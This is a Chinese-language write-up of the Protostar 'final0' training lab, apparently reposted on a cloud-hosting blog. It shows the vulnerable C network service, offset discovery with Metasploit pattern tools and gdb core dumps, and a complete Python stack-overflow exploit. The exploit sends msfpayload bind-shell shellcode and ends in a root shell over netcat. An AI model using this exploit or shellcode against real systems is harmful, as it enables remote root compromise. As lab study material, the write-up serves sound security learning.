溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Protostar final0

發(fā)布時間:2020-07-30 11:30:34 來源:網(wǎng)絡(luò) 閱讀:1446 作者:terrying 欄目:安全技術(shù)

Hints: depending on where you are returning to, you may wish to use a toupper() proof shellcode.

Source code
#include "../common/common.c"

#define NAME "final0"
#define UID 0
#define GID 0
#define PORT 2995

/*
* Read the username in from the network
*/

char *get_username()
{
char buffer[512];
char *q;
int i;

memset(buffer, 0, sizeof(buffer));
gets(buffer);

/* Strip off trailing new line characters */
q = strchr(buffer, '\n');
if(q) *q = 0;
q = strchr(buffer, '\r');
if(q) *q = 0;

/* Convert to lower case */
for(i = 0; i < strlen(buffer); i++) {
buffer[i] = toupper(buffer[i]);
}

/* Duplicate the string and return it */
return strdup(buffer);
}

int main(int argc, char **argv, char **envp)
{
int fd;
char *username;

/* Run the process as a daemon */
background_process(NAME, UID, GID);

/* Wait for socket activity and return */
fd = serve_forever(PORT);

/* Set the client socket to STDIN, STDOUT, and STDERR */
set_io(fd);

username = get_username();

printf("No such user %s\n", username);
}

終于來到Final了 T T 。。。

從題目的提示知道利用stack溢出,而且題中的buffer只開辟了512個字節(jié),因此可以通過溢出修改ret的地址跳到我們定義的shellcode中去。
那如何找到ret的地址呢?請看步驟:
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb 50
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab


#!/usr/bin/python

from socket import *
from struct import *

s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.0.71", 2995))

buffer = "a"*512
exc = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab"

s.send(buffer+exc)
接著在客戶端運(yùn)行一下,通過用gdb查看/tmp下面的調(diào)試文件信息即可得到真正的RET地址:
root@protostar:/# gdb --quiet --core=/tmp/core.11.final0.2036
Core was generated by `/opt/protostar/bin/final0'.
Program terminated with signal 11, Segmentation fault.
#0 0x37614136 in ?? ()



root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 0x37614136
[*] Exact match at offset 20

得到RET的位置在buffer的512+20的位置。
需要確認(rèn)的話則將buffer="a"*532+"\xef\xbe\xad\xde"發(fā)送過去,則在調(diào)試文件中將提示地址為0xdeadbeef出錯。在此就不確認(rèn)了,偷懶一下。。。

接下來需要一個shellcode,用msfpayload生成即可:
root@bt:~/Desktop/shellcode# msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)

unsigned char buf[] =
"\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6"
"\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3"
"\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8"
"\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8"
"\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa"
"\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72";

現(xiàn)將shellcode接在RET位置之后,通過查看調(diào)試文件需要找到shellcode的地址

#!/usr/bin/python

from socket import *
from struct import *

s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.0.71", 2995))

buffer = "a"*532
ret = "\xEF\xBE\xAD\xDE"
nop = "\x90"*20




#msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c
shellcode = "\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"\
"\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6"\
"\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3"\
"\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8"\
"\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8"\
"\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa"\
"\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72"


s.send(buffer + ret + nop + shellcode)

在/tmp文件夾下查看gdb文件:

root@protostar:/# gdb --quiet --core=/tmp/core.11.final0.2052
Core was generated by `/opt/protostar/bin/final0'.
Program terminated with signal 11, Segmentation fault.
#0 0xdeadbeef in ?? ()
(gdb) x/100x 0xbffffc00
0xbffffc00: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc10: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc20: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc30: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc40: 0x41414141 0x41414141 0x00000000 0x00000200
0xbffffc50: 0x61616161 0x61616161 0x61616161 0xdeadbeef
0xbffffc60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc70: 0x90909090 0xd6745fba 0xd9cddb3c 0x5ef42474
0xbffffc80: 0x14b1c931 0x03145631 0xc6831456 0xe781bd04
0xbffffc90: 0x5b89b6e7 0x5e246b5b 0x38086ad2 0x9b32ec29
0xbffffca0: 0x23c684e3 0x33ad0815 0xd5b8e044 0xd8e3660c
0xbffffcb0: 0xe752ef51 0x81e4ebe2 0xfe4773c9 0x6dc8beb4

得到目標(biāo)地址是0xbffffc60
現(xiàn)在RET的位置有了,shellcode的地址也有了,只欠東風(fēng)了。。

#!/usr/bin/python

from socket import *
from struct import *

s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.0.71", 2995))

buffer = "a"*532
ret = "\x60\xfc\xff\xbf"
nop = "\x90"*20




#msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c
shellcode = "\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"\
"\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6"\
"\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3"\
"\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8"\
"\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8"\
"\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa"\
"\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72"


s.send(buffer + ret + nop + shellcode)

用另一個客戶端連接4444端口(默認(rèn))

D:\>nc 192.168.0.71 4444
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root



向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI